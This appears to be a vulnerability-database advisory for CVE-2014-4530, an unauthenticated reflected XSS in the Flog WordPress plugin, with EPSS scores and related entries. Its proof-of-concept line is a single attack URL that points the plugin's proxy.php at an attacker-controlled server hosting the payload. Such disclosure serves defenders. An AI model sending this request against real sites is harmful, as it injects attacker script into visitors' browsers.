Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbWpvulndbWPVDB-ID:C3E33C8C-E8E6-4904-ABCB-CFF2D3FDA0D4
HistoryApr 25, 2014 - 12:00 a.m.

Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

2014-04-2500:00:00
wpscan.com
9

EPSS

0.001

Percentile

37.3%

JSON

The last time it was checked the plugin was still affected and had been closed.

PoC

https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silex_server/cgi/scripts/proxy.php?url=[ATTACKER_SERVER]/test.html With the payload in the test.html file controlled by the attackers

Related

prion 1
wpexploit 1
cvelist 1
nvd 1
cve 1
prion
prion
Cross site scripting
2020-01-10 13:15:00
wpexploit
wpexploit
Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
2014-04-25 00:00:00
cvelist
cvelist
CVE-2014-4530
2020-01-10 13:00:25
nvd
nvd
CVE-2014-4530
2020-01-10 13:15:12
cve
cve
CVE-2014-4530
2020-01-10 13:15:12

EPSS

0.001

Percentile

37.3%

JSON
Related for WPVDB-ID:C3E33C8C-E8E6-4904-ABCB-CFF2D3FDA0D4
prion1wpexploit1cvelist1nvd1cve1